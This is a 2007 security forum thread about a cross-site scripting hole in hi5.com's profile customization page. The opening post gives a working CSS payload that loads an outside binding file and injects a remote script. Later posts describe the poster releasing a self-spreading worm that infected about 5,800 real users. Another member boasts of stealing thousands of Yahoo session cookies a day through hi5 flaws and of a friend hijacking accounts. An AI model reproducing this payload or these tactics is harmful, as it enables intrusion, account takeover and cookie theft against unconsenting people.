Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
hi5.com xss
Posted by: sirdarckcat
Date: December 23, 2007 12:53AM

http://www.hi5.com/friend/account/displayEditProfileCustomization.do

style:

<style type='text/css'>strong{
-moz-binding:url(" http://ha.ckers.org/moz.xml#xss");
}

strong{
background:url("javascript:void(document.body.appendChild(document.createElement('script')).src=' http://h4k.in/i.js');");
}
</style>

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 12/23/2007 01:10AM by sirdarckcat.

Options: ReplyQuote
Re: hi5.com xss
Posted by: klaus
Date: December 23, 2007 09:39PM

wow. xss worm hitting hi5 in less than 24h...

btw, what is i.js doing?

Options: ReplyQuote
Re: hi5.com xss
Posted by: sirdarckcat
Date: December 23, 2007 10:47PM

i.js is nothing.. that's the XSS test case from .mario :P

the worm is going very slow, since it's programmed just for firefox.. since I'm lazy and I dont wanna find out why it's not working on IE

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: hi5.com xss
Posted by: nemessis
Date: December 24, 2007 07:06PM

They know about those issues from long time ago. Is not a secret that hi5 have csrf vuln in at least 4 places on the user profile pages. If you'll search random, you will find some hi-jacked or special made accounts used to stole users passwords or cookies from another web services (Yahoo, Hotmail etc). We tested hi5 to find all the csrf vulns and the results are:
- on the main page of the profile: csrf affecting IE6, Firefox and Safari for Windows
- on another profile page (shhht): csrf affecting IE6, IE7, Firefox, Safari for Windows and Opera
- In the comment box are 2 csrf vuln's but I was to lazy to find out how it works and which browser is affected. But a friend of mine is using that shit to steal "beautiful babes" accounts :)

Hi5 xss worms are up from long time ago. You can find full working worms sources on spanish and turkish hacking websites.

Anyway, nice find sirdarckcat. I was glad 1 month ago when I discovered for the first time those xss's but when I google it the results was very dissapointing for me. Hi5 is vulnerable from a very long time and those issues are public disclosed by security/hacking teams for at least 6 months.



Edited 1 time(s). Last edit at 12/24/2007 07:08PM by nemessis.

Options: ReplyQuote
Re: hi5.com xss
Posted by: sirdarckcat
Date: December 24, 2007 07:38PM

http://www.hi5.com/friend/profile/displayProfile.do?userid=177612560

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 2 time(s). Last edit at 12/24/2007 08:41PM by sirdarckcat.

Options: ReplyQuote
Re: hi5.com xss
Posted by: sirdarckcat
Date: December 25, 2007 05:04AM

btw if you use noscript or firefox 3, the exploit wont work.

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: hi5.com xss
Posted by: nemessis
Date: December 25, 2007 07:24AM

Do you have a method to find the results? I'm curios about spreading speed.

My results in 10 hours (this was my first attempt and I attacked Yahoo accounts, not hi5 accounts but i used the same hi5 vuln to do that - just IE6 browser was affected in this attempt) http://rapidshare.com/files/74270062/rstpower.wmv.html

With IE6 + Firefox affected & a grabber who don't display empty/incomplete cookies i've got 2K of GOOD Yahoo cookies/day. So there is a big impact if someone use a social network like hi5 for personal data stealing.

http://www.rstcenter.com - Romanian Security Team
Inchirieri limuzine



Edited 1 time(s). Last edit at 12/25/2007 08:03AM by nemessis.

Options: ReplyQuote
Re: hi5.com xss
Posted by: klaus
Date: December 25, 2007 08:03AM

Nemessis, ten users so far. Seems like hi5 users are not Firefox fans.

Options: ReplyQuote
Re: hi5.com xss
Posted by: nemessis
Date: December 25, 2007 08:05AM

Yes indeed. Most of them are IE6/IE7 users.

http://www.rstcenter.com - Romanian Security Team
Inchirieri limuzine

Options: ReplyQuote
Re: hi5.com xss
Posted by: sirdarckcat
Date: December 25, 2007 12:20PM

this works for IE6/7 but after exploitation it shows an error, anyway.. after exploitation..

Take into consideration it was christmas eve, no one is at hi5 at christmas..

Anny way, I recieve a friend request for each infected victim so.. so far, 15, from which 13 are real.. if this is really exponential, tomorrow I should have like 3k friends, and 40k after that.. etc..

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: hi5.com xss
Posted by: nemessis
Date: December 25, 2007 01:08PM

Nice. We didn't succeed to make a working exploit for IE7 on the main page of the profile.

http://www.rstcenter.com - Romanian Security Team
Inchirieri limuzine

Options: ReplyQuote
Re: hi5.com xss
Posted by: sirdarckcat
Date: December 25, 2007 11:19PM

there are now 82 infected.
7 are not infected, but sent the friend request, I dunno why.. maybe they use Opera,/Safari/NoScript..

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: hi5.com xss
Posted by: sirdarckcat
Date: December 26, 2007 12:02PM

A chart.. hey it is exponential.. anyway, it looks quadratic to me..



with help of thornmaker, and a very cool applet, it appears that the growth of the worm follows:

4.07271957142175*(1.049393949541566)^time



I'm thinking that the following worms should have google analytics..

For the record..

Account created:
hi5 <info@hi5.com> Welcome to hi5! Mon, 24 Dec 2007 16:26:00 -0700

The worm was on like.. 10 minutes after that.

I searched for random persons and sent them friends requests.. so they check my the profile.

The first victim:

"info@hi5.com" <info@hi5.com> v4k3 Lozano has accepted your Friend Request Mon, 24 Dec 2007 18:39:52 -0700

It's a shame she deleted the account:

http://hi5.com/friend/profile/displayProfile.do?userid=19242119

She deleted the account.. on Wed, 26 Dec 2007 13:17:40 -0700

At 2:37 of GMT-6 of Wednesday 26.. the script that added friends was slower than the users sending friend requests.

On wednesday, spamcero.com staff sent an e-mail asking me to stop the e-mails.. so I changed the mail of registration.

and well, no word from hi5.com staff.. yet

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 12 time(s). Last edit at 12/26/2007 03:07PM by sirdarckcat.

Options: ReplyQuote
Re: hi5.com xss
Posted by: klaus
Date: December 26, 2007 03:31PM

This thing is going to reach "Singularity" in less than 24h!

Options: ReplyQuote
Re: hi5.com xss
Posted by: klaus
Date: December 26, 2007 07:09PM

Over 3000 added now. Fascinating to see it spreading.

Options: ReplyQuote
Re: hi5.com xss
Posted by: klaus
Date: December 26, 2007 08:48PM

5000 friends. Over and out. Santa removed.

Options: ReplyQuote
Re: hi5.com xss
Posted by: sirdarckcat
Date: December 27, 2007 12:47AM

actually the account was still there, I was still able to add friends, it reached 5,800, and then I was banned.

it was cool :P, the next worm should have google analytics, it would make the things much easier to track :P..

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: hi5.com xss
Posted by: sirdarckcat
Date: December 27, 2007 08:30PM

This is the last chart I was able to get:



You can clearly see where I was not able anymore of accepting new friends.. they where arriving too fast


anyway, that stops on 1037 friends, the total was 5800, but I'm not able to get the other data since.. well.. the e-mail server collapsed.

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 12/27/2007 08:31PM by sirdarckcat.

Options: ReplyQuote
Re: hi5.com xss
Posted by: sirdarckcat
Date: December 29, 2007 01:13PM

I checked today again the e-mail this is the last chart:



amazing.. even do it's not spreading anymore, all those persons added "Santa" as a friend.

And here's all the love the affected users sent to santa:

http://www.hi5.com/friend/profile/displayScrapbook.do?userid=177612560&offset=0&page=first

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 12/29/2007 01:16PM by sirdarckcat.

Options: ReplyQuote


Sorry, only registered users may post in this forum.